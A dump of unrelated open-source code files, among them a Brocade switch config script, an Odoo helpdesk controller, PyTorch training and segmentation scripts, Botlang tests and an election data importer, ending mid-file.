All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may also obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\n:mod:`switch_config_apply` - PyFOS util for specific config op use case.\n***********************************************************************************\nThe :mod:`switch_config_apply` provides for specific config op use case.\n\nThis module is a standalone script that can be used to apply saved\nconfiguration files to the switch. Any drift will be reset to the\nsaved value.\n\n* inputs:\n * -L=: Login ID. If not provided, interactive\n prompt will request one.\n * -P=: Password. If not provided, interactive\n prompt will request one.\n * -i=: IP address\n * -c=: name of the directory that contains\n JSON encoded switch configuration files\n * -f=: VFID or -1 if VF is disabled. If unspecified,\n VFID of 128 is assumed.\n\n* outputs:\n * List of attributes that changed.\n\n\"\"\"\n\nimport pyfos.pyfos_auth as pyfos_auth\nimport pyfos.pyfos_zone as pyfos_zone\nimport pyfos.pyfos_switch as pyfos_switch\nimport pyfos.pyfos_switchfcport as pyfos_switchfcport\nimport pyfos.pyfos_util as pyfos_util\nimport sys\nimport pyfos.utils.brcd_util as brcd_util\nimport json\nimport jsondiff\n\n\ndef usage():\n print(\"usage:\")\n print('switch_config_apply.py -i -c ')\n\n\ndef apply_to_object_help(\n session, pyfos_class, pyfos_object, old_object_in_dict, diffs):\n patch_object = pyfos_class()\n # find if any keys and populate with the current values\n object_keys = []\n for key in pyfos_object.namekeys():\n if pyfos_object.is_key_attrib(key):\n object_keys.append(key)\n base_id = old_object_in_dict[pyfos_object.getcontainer()]\n for key in object_keys:\n # print(object.getattribute(key).getuservalue())\n patch_object.getattribute(key).setuservalue(\n pyfos_object.getattribute(key).getuservalue())\n base_id = base_id[key]\n # print(base_id)\n # print(patch_object.getattribute(key).getuservalue())\n\n changed = False\n for key, value in diffs.items():\n for key, value in diffs[pyfos_object.getcontainer()].items():\n if pyfos_object.getattribute(key).getisconfig():\n patch_object.getattribute(key).setvalue(\n old_object_in_dict[pyfos_object.getcontainer()][key])\n # print(patch_object.getattribute(key).getuservalue())\n print(\"\\t\", base_id, key, \"reverted from\", value, \"to\",\n patch_object.getattribute(key).getuservalue())\n changed = True\n else:\n print(\"\\t\", base_id, \"read-only\", key, \"remains at\", value)\n\n if changed:\n result = patch_object.patch(session)\n print(pyfos_class.__name__, \"patch result:\", result)\n\n\ndef apply_to_object(session, dir_name, pyfos_class):\n pyfos_object = pyfos_class.get(session)\n current_object_in_dict = json.loads(\n json.dumps(\n pyfos_object, cls=pyfos_util.json_encoder,\n sort_keys=True, indent=4))\n fp = open(dir_name + \"/\" + pyfos_class.__name__, 'r')\n old_object_in_dict = json.load(fp)\n fp.close()\n diffs = jsondiff.diff(old_object_in_dict, current_object_in_dict)\n if len(diffs) == 0:\n print(pyfos_class.__name__ + \" has not drifted\")\n else:\n 
print(pyfos_class.__name__ + \" diff(s) are:\")\n apply_to_object_help(\n session, pyfos_class, pyfos_object, old_object_in_dict, diffs)\n\n\ndef apply_to_object_list(session, dir_name, pyfos_class):\n pyfos_object = pyfos_class.get(session)\n current_object_in_dict = json.loads(\n json.dumps(\n pyfos_object, cls=pyfos_util.json_encoder,\n sort_keys=True, indent=4))\n fp = open(dir_name + \"/\" + pyfos_class.__name__, 'r')\n old_object_in_dict = json.load(fp)\n fp.close()\n diffs = jsondiff.diff(old_object_in_dict, current_object_in_dict)\n if len(diffs) == 0:\n print(pyfos_class.__name__ + \" has not drifted\")\n else:\n print(pyfos_class.__name__ + \" diff(s) are:\")\n for key, value in diffs.items():\n apply_to_object_help(\n session, pyfos_class, pyfos_object[key],\n old_object_in_dict[key], value)\n\n\ndef main(argv):\n isHttps = \"0\"\n\n inputs = brcd_util.generic_input(argv, usage)\n\n session = pyfos_auth.login(inputs[\"login\"], inputs[\"password\"],\n inputs[\"ipaddr\"], isHttps)\n if pyfos_auth.is_failed_login(session):\n print(\"login failed because\",\n session.get(pyfos_auth.CREDENTIAL_KEY)\n [pyfos_auth.LOGIN_ERROR_KEY])\n usage()\n sys.exit()\n\n brcd_util.exit_register(session)\n\n vfid = None\n if 'vfid' in inputs:\n vfid = inputs['vfid']\n\n if vfid is not None:\n pyfos_auth.vfid_set(session, vfid)\n\n if 'compare' not in inputs or inputs['compare'] is None:\n usage()\n sys.exit()\n\n dir_name = inputs['compare']\n\n apply_to_object(session, dir_name, pyfos_switch.fibrechannel_switch)\n apply_to_object_list(session, dir_name, pyfos_switchfcport.fibrechannel)\n apply_to_object(session, dir_name, pyfos_zone.defined_configuration)\n apply_to_object(session, dir_name, pyfos_zone.effective_configuration)\n\n pyfos_auth.logout(session)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"pyfos/utils/config/switch_config_apply.py","file_name":"switch_config_apply.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"209684387","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nfrom werkzeug.exceptions import NotFound\n\nfrom odoo import http\nfrom odoo.http import request\n\nfrom odoo.addons.website_helpdesk.controllers.main import website_account\nfrom odoo.addons.website_helpdesk_form.controller.main import WebsiteForm\n\nclass website_account(website_account):\n\n @http.route(['/my/tickets'], type='http', auth=\"user\", website=True)\n def my_helpdesk_tickets(self, **kw):\n values = self._prepare_portal_layout_values()\n user = request.env.user\n\n contract_partner = user.partner_id.parent_id.id or user.partner_id.id\n partner_ids = []\n partner_ids.append(user.partner_id.id)\n\n # supports tickets \n filtred_support = []\n supports = request.env['helpdesk.team'].search([('website_published','=',True),('support_team','=',True)])\n for support in supports :\n if contract_partner in support.partner_ids.ids:\n filtred_support.append(support)\n\n \n # contracts tickets\n user_contract = request.env['helpdesk.team'].search([('website_published','=',True),('partner_id','=',contract_partner)])\n\n # USERS WANT SEE ALL TICKETS OF HIS COMPANY\n if kw.get('filtred_tickets') and kw.get('filtred_tickets') == 'partner_tickets' :\n if user.partner_id.parent_id.id:\n parent_users = request.env['res.partner'].search([('parent_id','=',user.partner_id.parent_id.id)])\n partner_ids = parent_users.ids\n\n tickets = request.env['helpdesk.ticket'].sudo().search(['|', ('user_id', 
'=', user.id), ('partner_id', 'in', partner_ids)])\n \n values.update({\n 'tickets': tickets,\n 'filtre': kw.get('filtred_tickets') or 'my_tickets',\n 'supports':filtred_support,\n 'user_contract': user_contract,\n 'default_url': '/my/tickets',\n })\n return request.render(\"website_helpdesk.portal_helpdesk_ticket\", values)\n\n\n\nclass WebsiteForm(WebsiteForm):\n\n @http.route('''/helpdesk//submit''', type='http', auth=\"public\", website=True)\n def website_helpdesk_form(self, team, **kwargs):\n default_values = {}\n if request.env.user.partner_id != request.env.ref('base.public_partner'):\n default_values['name'] = request.env.user.partner_id.name\n default_values['email'] = request.env.user.partner_id.email\n #types ticket\n ticket_type_ids = request.env['helpdesk.ticket.type'].search([])\n \n #types ticket\n sourceChannel = request.env['utm.medium'].search([('name','=','Website')])[0]\n \n default_values['utm_medium_id'] = sourceChannel.id\n \n return request.render(\"website_helpdesk_form.ticket_submit\", {'team': team, 'ticket_type_ids': ticket_type_ids,'default_values': default_values})\n\n\n# @http.route(['/helpdesk/', '/helpdesk/'], type='http', auth=\"public\", website=True)\n# def website_helpdesk_teams(self, team=None, **kwargs):\n# search = kwargs.get('search')\n# # For breadcrumb index: get all team\n# teams = request.env['helpdesk.team'].search(['|', '|', ('use_website_helpdesk_form', '=', True), ('use_website_helpdesk_forum', '=', True), ('use_website_helpdesk_slides', '=', True)], order=\"id asc\")\n# if not request.env.user.has_group('helpdesk.group_helpdesk_manager'):\n# teams = teams.filtered(lambda team: team.website_published)\n# if not teams:\n# return request.render(\"website_helpdesk.not_published_any_team\")\n# result = self.get_helpdesk_team_data(team or teams[0], search=search)\n# # For breadcrumb index: get all team\n# result['teams'] = teams\n# return request.render(\"website_helpdesk.team\", result)\n\n","sub_path":"Macq_Website/macq_helpdesk/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"50243273","text":"import numpy as np\nimport torch\nfrom torch.nn.utils import parameters_to_vector\nfrom torch.utils.data import DataLoader\nfrom torch.optim import Adam\nfrom torch.optim.lr_scheduler import LambdaLR\nfrom torchvision.datasets import VisionDataset\nfrom tqdm import tqdm\n\nfrom preds.models import CIFAR10Net, CIFAR100Net, MLPS\nfrom preds.datasets import MNIST, FMNIST, CIFAR10\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\n\nclass QuickDS(VisionDataset):\n\n def __init__(self, ds, device):\n self.D = [(ds[i][0].to(device), torch.tensor(ds[i][1]).to(device))\n for i in range(len(ds))]\n self.K = ds.K\n self.channels = ds.channels\n self.pixels = ds.pixels\n\n def __getitem__(self, index):\n return self.D[index]\n\n def __len__(self):\n return len(self.D)\n\n\ndef get_dataset(dataset, double, device=None):\n if dataset == 'MNIST':\n ds_train = MNIST(train=True, double=double)\n ds_test = MNIST(train=False, double=double)\n elif dataset == 'FMNIST':\n ds_train = FMNIST(train=True, double=double)\n ds_test = FMNIST(train=False, double=double)\n elif dataset == 'CIFAR10':\n ds_train = CIFAR10(train=True, double=double)\n ds_test = CIFAR10(train=False, double=double)\n else:\n raise ValueError('Invalid dataset argument')\n if device is not None:\n return QuickDS(ds_train, device), 
QuickDS(ds_test, device)\n else:\n return ds_train, ds_test\n\n\ndef get_model(model_name, ds_train):\n if model_name == 'MLP':\n input_size = ds_train.pixels ** 2 * ds_train.channels\n hidden_sizes = [1024, 512, 256, 128]\n output_size = ds_train.K\n return MLPS(input_size, hidden_sizes, output_size, 'tanh', flatten=True)\n elif model_name == 'CNN':\n return CIFAR10Net(ds_train.channels, ds_train.K, use_tanh=True)\n elif model_name == 'AllCNN':\n return CIFAR100Net(ds_train.channels, ds_train.K)\n else:\n raise ValueError('Invalid model name')\n\n\ndef evaluate(model, data_loader, criterion, device):\n model.eval()\n loss, acc = 0, 0\n with torch.no_grad():\n for X, y in data_loader:\n X, y = X.to(device), y.to(device)\n fs = model(X)\n acc += (torch.argmax(fs, dim=-1) == y).sum().cpu().float().item()\n loss += criterion(fs, y).item()\n return loss / len(data_loader.dataset), acc / len(data_loader.dataset)\n\n\ndef main(ds_train, ds_test, model_name, seed, n_epochs, batch_size, lr, deltas, device, fname):\n train_loader = DataLoader(ds_train, batch_size=batch_size, shuffle=True)\n test_loader = DataLoader(ds_test, batch_size=batch_size, shuffle=False)\n for delta in deltas:\n torch.manual_seed(seed)\n model = get_model(model_name, ds_train).to(device)\n optim = Adam(model.parameters(), lr=lr, weight_decay=delta)\n scheduler = LambdaLR(optim, lr_lambda=lambda epoch: 1/(epoch // 10 + 1))\n criterion = torch.nn.CrossEntropyLoss(reduction='sum')\n losses = list()\n N = len(ds_train)\n # training\n for epoch in tqdm(list(range(n_epochs))):\n running_loss = 0.0\n for X, y in train_loader:\n # X, y = X.to(device), y.to(device)\n M = len(y)\n optim.zero_grad()\n fs = model(X)\n loss = N / M * criterion(fs, y)\n loss.backward()\n optim.step()\n p = parameters_to_vector(model.parameters()).detach()\n running_loss += loss.item() + (1/2 * delta * p.square().sum()).item()\n loss_avg = running_loss / len(train_loader)\n losses.append(loss_avg)\n scheduler.step()\n # evaluation\n tr_loss, tr_acc = evaluate(model, train_loader, criterion, device)\n te_loss, te_acc = evaluate(model, test_loader, criterion, device)\n metrics = {'test_loss': te_loss, 'test_acc': te_acc,\n 'train_loss': tr_loss, 'train_acc': tr_acc}\n\n state = {'model': model.state_dict(), 'optimizer': optim.state_dict(),\n 'losses': losses, 'metrics': metrics, 'delta': delta}\n torch.save(state, fname.format(delta=delta))\n\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n datasets = ['MNIST', 'FMNIST', 'CIFAR10']\n models = ['CNN', 'AllCNN', 'MLP']\n parser.add_argument('-d', '--dataset', help='dataset', choices=datasets)\n parser.add_argument('-m', '--model', help='which model to train', choices=models)\n parser.add_argument('-s', '--seed', help='randomness seed', default=117, type=int)\n parser.add_argument('--n_epochs', help='epochs training neural network', default=500, type=int)\n parser.add_argument('--batch_size', default=512, type=int)\n parser.add_argument('--lr', help='neural network learning rate', default=1e-3, type=float)\n parser.add_argument('--n_deltas', help='number of deltas to try', default=16, type=int)\n parser.add_argument('--logd_min', help='min log delta', default=-2.0, type=float)\n parser.add_argument('--logd_max', help='max log delta', default=3.0, type=float)\n parser.add_argument('--double', help='double precision', action='store_true')\n args = parser.parse_args()\n dataset = args.dataset\n double = args.double\n model_name = args.model\n seed = args.seed\n n_epochs = 
args.n_epochs\n lr = args.lr\n batch_size = args.batch_size\n n_deltas = args.n_deltas\n logd_min, logd_max = args.logd_min, args.logd_max\n\n if double:\n torch.set_default_dtype(torch.double)\n\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n ds_train, ds_test = get_dataset(dataset, double, device)\n\n # naming convention: dataset_model_seed_delta\n fname = 'models/' + '_'.join([dataset, model_name, str(seed)]) + '_{delta:.1e}.pt'\n deltas = np.logspace(logd_min, logd_max, n_deltas)\n deltas = np.insert(deltas, 0, 0) # add unregularized network\n\n main(ds_train, ds_test, model_name, seed, n_epochs, batch_size, lr, deltas, device, fname)\n","sub_path":"Laplace_GCN_Code/experiments/imgclassification.py","file_name":"imgclassification.py","file_ext":"py","file_size_in_byte":6111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"619092716","text":"import sys\nfrom nltk.sem import Expression\nfrom nltk.inference import ResolutionProver\nimport pandas\n\n# expression for NLP, knowledge base intialisation\nread_expr = Expression.fromstring\nkb=[]\ndata = pandas.read_csv('./data/kb.csv', header=None)\n[kb.append(read_expr(row)) for row in data[0]]\n#If we enter a blank expression, the KB will check for contradictions, \n#returning true if there is a problem\nanswer=ResolutionProver().prove(\"\", kb, verbose=False)\nif answer:\n print(\"Contradiction with the knowledge base, exiting\")\n sys.exit()\n\ndef add_knowledge(statement, verbose=False):\n replys = []\n object, subject = statement.split(' is ')\n expr=read_expr(subject + '(' + object + ')')\n print(expr)\n kb.append(expr) \n answer=ResolutionProver().prove(expr, kb, verbose=verbose)\n if answer:\n replys.append(\"OK, I will remember that {} is {}\".format(object, subject))\n else:\n kb.remove(expr)\n replys.append(\"This is contradicting! 
I have ignored you.\")\n \n replys.append(\"Anything else you would like to know?\")\n return replys\n\ndef check_knowledge(statement, verbose=False):\n # check that * is *\"\n replys = []\n object, subject = statement.split(' is ')\n raw_expr = subject + '(' + object + ')'\n expr=read_expr(raw_expr)\n answer=ResolutionProver().prove(expr, kb, verbose=verbose)\n if answer:\n replys.append(\"That is Correct!\")\n else:\n if \"not\" in subject:\n subject = subject.replace(\"not\", \"\")\n else:\n subject = \"not \" + subject\n expr=read_expr(subject + '(' + object + ')')\n answer=ResolutionProver().prove(expr, kb, verbose=verbose)\n if answer:\n replys.append(\"This is definitely false\")\n else:\n replys.append(\"Sorry I don't know.\")\n \n replys.append(\"Anything else you would like to know?\")\n return replys","sub_path":"knowledge.py","file_name":"knowledge.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"208228096","text":"import unittest\n\nimport math\n\nfrom botlang.interpreter import BotlangSystem\n\n\nclass BotlangTestCase(unittest.TestCase):\n\n def test_filter(self):\n\n filtered_list = BotlangSystem.run(\"\"\"\n (filter (function (v) (> v 3)) (list 5 2 8 9 1 33 -1 -5 4))\n \"\"\")\n self.assertEqual(filtered_list, [5, 8, 9, 33, 4])\n\n def test_sort(self):\n\n sorted_lists = BotlangSystem.run(\"\"\"\n [define num-list (list 5 3 0 4 9 1)]\n [define asc-nums (sort (function (a b) (< a b)) num-list)]\n [define desc-nums (sort (function (a b) (> a b)) num-list)]\n\n [define objs-list\n (list\n (list \"holi\" 1)\n (list \"shao\" 4)\n (list \"bla\" -3)\n (list \"lala\" -8)\n )\n ]\n [define asc-objs\n (sort [function (a b) (< (get a 1) (get b 1))] objs-list)\n ]\n [define desc-objs\n (sort [function (a b) (> (get a 1) (get b 1))] objs-list)\n ]\n\n (make-dict\n (list\n (list \"asc-nums\" asc-nums)\n (list \"desc-nums\" desc-nums)\n (list \"asc-objs\" asc-objs)\n (list \"desc-objs\" desc-objs)\n )\n )\n \"\"\")\n self.assertEqual(sorted_lists['asc-nums'], [0, 1, 3, 4, 5, 9])\n self.assertEqual(sorted_lists['desc-nums'], [9, 5, 4, 3, 1, 0])\n self.assertEqual(\n sorted_lists['asc-objs'],\n [[\"lala\", -8], [\"bla\", -3], [\"holi\", 1], [\"shao\", 4]]\n )\n self.assertEqual(\n sorted_lists['desc-objs'],\n [[\"shao\", 4], [\"holi\", 1], [\"bla\", -3], [\"lala\", -8]]\n )\n\n def test_type_conversion(self):\n\n str_to_num = BotlangSystem.run('(num \"666\")')\n self.assertEqual(str_to_num, 666)\n\n num_to_str = BotlangSystem.run('(str 666)')\n self.assertEqual(num_to_str, \"666\")\n\n def test_base64(self):\n\n encoded = BotlangSystem.run('(b64-encode \"hólá\")')\n self.assertEqual(encoded, 'aMOzbMOh')\n\n decoded = BotlangSystem.run('(b64-decode \"aMOzbMOh\")')\n self.assertEqual(decoded, 'hólá')\n\n def test_compression(self):\n\n text = \"\"\"\n Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod\n tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim\n veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea\n commodo consequat. Duis aute irure dolor in reprehenderit in voluptate\n velit esse cillum dolore eu fugiat nulla pariatur. 
Excepteur sint\n occaecat cupidatat non proident, sunt in culpa qui officia deserunt\n mollit anim id est laborum.\n \"\"\"\n\n self.assertEqual(len(text), 511)\n compressed = BotlangSystem.run('(bz2-compress \"{0}\")'.format(text))\n self.assertEqual(len(compressed), 420)\n\n decompressed = BotlangSystem.run(\n '(bz2-decompress \"{0}\")'.format(compressed)\n )\n self.assertEqual(len(decompressed), len(text))\n\n def test_reverse(self):\n\n result = BotlangSystem.run('(reverse (list 1 2 3 4))')\n self.assertEqual(result, [4, 3, 2, 1])\n\n result = BotlangSystem.run('(reverse \"sergio\")')\n self.assertEqual(result, \"oigres\")\n\n def test_enumerate(self):\n\n result = BotlangSystem.run('(enumerate \"abcd\")')\n self.assertEqual(result, [(0, 'a'), (1, 'b'), (2, 'c'), (3, 'd')])\n\n def test_sum(self):\n\n result = BotlangSystem.run('(sum (list 1 2 3 4 10))')\n self.assertEqual(result, 20)\n\n def test_type(self):\n\n self.assertTrue(\n BotlangSystem.run('(list? (list 1 2 3))')\n )\n self.assertFalse(\n BotlangSystem.run('(list? \"bla\")')\n )\n\n def test_string_append(self):\n\n self.assertEqual(\n BotlangSystem.run('(append \"holi\" \"hola\")'),\n 'holihola'\n )\n\n def test_list_append(self):\n\n self.assertEqual(\n BotlangSystem.run('(append (list 1 2) (list 3))'),\n [1, 2, 3]\n )\n\n def test_any_satisfy(self):\n\n self.assertTrue(\n BotlangSystem.run(\n '(any-satisfy? (fun (x) (equal? x 3)) (list 1 2 3 4))'\n )\n )\n self.assertTrue(\n BotlangSystem.run(\n '(any-satisfy? (fun (x) (equal? x 2)) (list 1 2 3 4))'\n )\n )\n self.assertFalse(\n BotlangSystem.run(\n '(any-satisfy? (fun (x) (equal? x -1)) (list 1 2 3 4))'\n )\n )\n\n def test_timestamp(self):\n\n t0 = math.floor(BotlangSystem.run('(timestamp)'))\n import time\n time.sleep(0.51)\n t1 = round(BotlangSystem.run('(timestamp)'))\n self.assertEqual(t1 - t0, 1)\n\n def test_type_checking(self):\n\n self.assertTrue(BotlangSystem().eval('(bool? #t)'))\n self.assertTrue(BotlangSystem().eval('(bool? #f)'))\n self.assertFalse(BotlangSystem().eval('(bool? \"#t\")'))\n self.assertFalse(BotlangSystem().eval('(bool? \"#f\")'))\n\n self.assertTrue(BotlangSystem().eval('(str? \"#t\")'))\n self.assertTrue(BotlangSystem().eval('(str? \"#f\")'))\n self.assertFalse(BotlangSystem().eval('(str? 2)'))\n self.assertFalse(BotlangSystem().eval('(str? #f)'))\n\n self.assertTrue(BotlangSystem().eval('(num? 1)'))\n self.assertTrue(BotlangSystem().eval('(num? 6.1212121)'))\n self.assertFalse(BotlangSystem().eval('(num? \"#t\")'))\n self.assertFalse(BotlangSystem().eval('(num? #f)'))\n\n self.assertTrue(BotlangSystem().eval('(int? 2)'))\n self.assertTrue(BotlangSystem().eval('(int? -667)'))\n self.assertFalse(BotlangSystem().eval('(int? 6.12)'))\n self.assertFalse(BotlangSystem().eval('(int? \"#f\")'))\n\n self.assertTrue(BotlangSystem().eval('(list? (list 1 2 3))'))\n self.assertTrue(BotlangSystem().eval('(list? (list))'))\n self.assertFalse(BotlangSystem().eval('(list? 1)'))\n self.assertFalse(BotlangSystem().eval('(list? 
\"#f\")'))\n\n def test_random(self):\n iterations = 100\n for _ in range(iterations):\n value = BotlangSystem().eval('(random 0 5)')\n self.assertTrue(0 <= value <= 5)\n","sub_path":"tests/primitives/test_primitives.py","file_name":"test_primitives.py","file_ext":"py","file_size_in_byte":6359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"515473425","text":"#!/usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import Joy\nfrom marine_msgs.msg import Helm\nfrom std_msgs.msg import String\n\nhelm_publisher = None\npiloting_mode_publisher = None\nstate = 'standby'\n\ndef joystickCallback(msg):\n global state\n \n state_request = None\n if msg.buttons[0]:\n state_request = 'manual'\n if msg.buttons[1]:\n state_request = 'autonomous'\n if msg.buttons[2]:\n state_request = 'standby'\n if state_request is not None and state_request != state:\n piloting_mode_publisher.publish('piloting_mode '+state_request)\n state = state_request\n \n if state == 'manual':\n helm = Helm()\n helm.header.stamp = rospy.Time.now()\n helm.throttle = msg.axes[1]\n helm.rudder = -msg.axes[3]\n helm_publisher.publish(helm)\n \nif __name__ == '__main__':\n rospy.init_node('joy_to_helm')\n helm_publisher = rospy.Publisher('/udp/helm', Helm, queue_size=10)\n piloting_mode_publisher = rospy.Publisher('/send_command', String, queue_size=10)\n joy_subscriber = rospy.Subscriber('/joy', Joy, joystickCallback)\n rospy.spin()\n \n","sub_path":"nodes/joy_to_helm.py","file_name":"joy_to_helm.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"624229436","text":"import torch\nimport cv2\nimport rasterio\nimport numpy as np\nfrom dataloader import make_grid, identity, Window, rle_numba_encode\nimport gc\nimport pathlib\nimport pandas as pd\nimport glob\nimport os\nfrom tqdm import tqdm\nfrom torchvision import transforms as T\nfrom model import get_unet_model\n\nDEVICE = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n# DATA_PATH = '/home/zhaohoj/development_sshfs/dataset/kaggle-hubmap-kidney-segmentation/'\n# DATA_PATH = '/data/home/zhaohj/dev/dataset/kaggle-hubmap-kidney-segmentation/'\nDATA_PATH = 'F:/Data/kaggle/kaggle-hubmap-kidney-segmentation/'\npth_path = 'D:\\workspace\\kaggle-project\\HuBMAP/pth/'\n# pth_path = '/data/home/zhaohj/dev/dataset/pth/pth'\n# pth_path = '/data/home/zhaohj/workspace/kaggle-project/HuBMAP/pth/'\nWINDOW = 1024\nMIN_OVERLAP = 40\n\nmodel_filepaths = [os.path.join(pth_path, filename) for filename in os.listdir(pth_path)]\n\np = pathlib.Path(DATA_PATH)\nNEW_SIZE = 256\nfold_models = []\nmodel = get_unet_model()\nmodel.to(DEVICE)\n# model = torch.nn.DataParallel(model)\n\nfor fold_model_path in model_filepaths:\n model.load_state_dict(torch.load(fold_model_path))\n fold_models.append(model)\n\ntest_fns = glob.glob(os.path.join(DATA_PATH, 'test/*.tiff'))\nsubm = {}\nTHRESHOLD = 0.5\ntrfm = T.Compose([\n T.ToPILImage(),\n T.Resize(NEW_SIZE),\n T.ToTensor(),\n T.Normalize([0.625, 0.448, 0.688],\n [0.131, 0.177, 0.101]),\n])\nfor i, filename in tqdm(enumerate(test_fns), total=len(test_fns)):\n print(f\"{i + 1} Predicting {os.path.basename(filename).split('.')[0]}\")\n dataset = rasterio.open(filename, transform=identity)\n slices = make_grid(dataset.shape, window=WINDOW, min_overlap=MIN_OVERLAP)\n preds = np.zeros(dataset.shape, dtype=np.uint8)\n\n for (x1, x2, y1, y2) in slices:\n image = dataset.read([1, 2, 3],\n window=Window.from_slices((x1, 
x2), (y1, y2)))\n image = np.moveaxis(image, 0, -1)\n image = cv2.resize(image, (NEW_SIZE, NEW_SIZE))\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)\n image = trfm(image)\n image = image.unsqueeze(0)\n pred = None\n for fold_model_path in model_filepaths:\n model.load_state_dict(torch.load(fold_model_path))\n model.eval()\n image = image.to(DEVICE)\n with torch.no_grad():\n score = model(image).squeeze()\n if pred is None:\n pred = score\n else:\n pred += score\n pred = pred / len(fold_models)\n pred = pred.sigmoid().cpu().numpy()\n pred = cv2.resize(pred, (WINDOW, WINDOW))\n preds[x1:x2, y1:y2] = (pred > THRESHOLD).astype(np.uint8)\n subm[i] = {'id': os.path.basename(filename).split('.')[0], 'predicted': rle_numba_encode(preds)}\n del preds\n gc.collect()\n\nsubmission = pd.DataFrame.from_dict(subm, orient='index')\nsubmission.to_csv('submission.csv', index=False)","sub_path":"HuBMAP/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"194214067","text":"# ===============================================================================\n# Copyright 2015 Jake Ross\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ===============================================================================\n\n# ============= enthought library imports =======================\nfrom traits.api import Str, Bool, Float, Property, List, Color, Enum\n# ============= standard library imports ========================\n# ============= local library imports ==========================\nfrom pychron.options.views.isochron_views import INVERSE_ISOCHRON_VIEWS, ISOCHRON_VIEWS\nfrom pychron.options.options import AgeOptions\nfrom pychron.pychron_constants import FIT_ERROR_TYPES\n\n\nclass IsochronOptions(AgeOptions):\n subview_names = List(['Main', 'Appearance'])\n\n def get_subview(self, name):\n name = name.lower()\n klass = self._get_subview(name)\n obj = klass(model=self)\n return obj\n\n def _get_subview(self, name):\n return ISOCHRON_VIEWS[name]\n\n def _aux_plots_default(self):\n return [self.aux_plot_klass(plot_enabled=True, name='inverse_isochron')]\n\n\nclass InverseIsochronOptions(IsochronOptions):\n error_calc_method = Enum(*FIT_ERROR_TYPES)\n fill_ellipses = Bool(False)\n show_nominal_intercept = Bool(False)\n nominal_intercept_label = Str('Atm', enter_set=True, auto_set=False)\n nominal_intercept_value = Property(Float, depends_on='_nominal_intercept_value')\n _nominal_intercept_value = Float(295.5, enter_set=True, auto_set=False)\n\n invert_nominal_intercept = Bool(True)\n inset_marker_size = Float(1.0)\n inset_marker_color = Color('black')\n regressor_kind = Enum('Reed', 'NewYork')\n \n def _set_nominal_intercept_value(self, v):\n self._nominal_intercept_value = v\n\n def _get_nominal_intercept_value(self):\n v = self._nominal_intercept_value\n if self.invert_nominal_intercept:\n v **= -1\n return v\n\n def _get_subview(self, name):\n return INVERSE_ISOCHRON_VIEWS[name]\n\n# 
============= EOF =============================================\n","sub_path":"pychron/options/isochron.py","file_name":"isochron.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"115865907","text":"from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"BOL\"\n addresses_name = \"2021-05-01T18:52:07.783562/Democracy_Club__06May2021.CSV\"\n stations_name = \"2021-05-01T18:52:07.783562/Democracy_Club__06May2021.CSV\"\n elections = [\"2021-05-06\"]\n csv_delimiter = \",\"\n\n def station_record_to_dict(self, record):\n if record.polling_place_id == \"4291\":\n # Trinity Methodist Hall (postcode geocode puts this quite away from actual location, making error spotting\n # more difficult)\n record = record._replace(\n polling_place_easting=374156, polling_place_northing=405696\n )\n\n return super().station_record_to_dict(record)\n\n def address_record_to_dict(self, record):\n uprn = record.property_urn.strip().lstrip(\"0\")\n\n if uprn in [\n \"100012434533\", # RATCLIFFES FARM HOUSE, WINGATES LANE, WESTHOUGHTON, BOLTON\n \"10070916825\", # CURLEYS FISHERY, TOP O TH WALLSUCHES, HORWICH, BOLTON\n \"100012431797\", # 321 DERBY STREET, BOLTON\n \"10001244960\", # FLAT 3, 115-117 DERBY STREET, BOLTON\n \"100012556511\", # 152 LONGSIGHT, BOLTON\n ]:\n return None\n\n # FLAT 1 290 ST HELENS ROAD, BOLTON\n if uprn == \"10001244221\":\n record = record._replace(property_urn=\"\", post_code=\"BL1 4JU\")\n\n if record.addressline6 in [\n \"BL2 4JU\",\n \"BL2 3EL\",\n \"BL2 3BQ\",\n \"BL2 6DZ\",\n \"BL1 3QW\",\n \"BL2 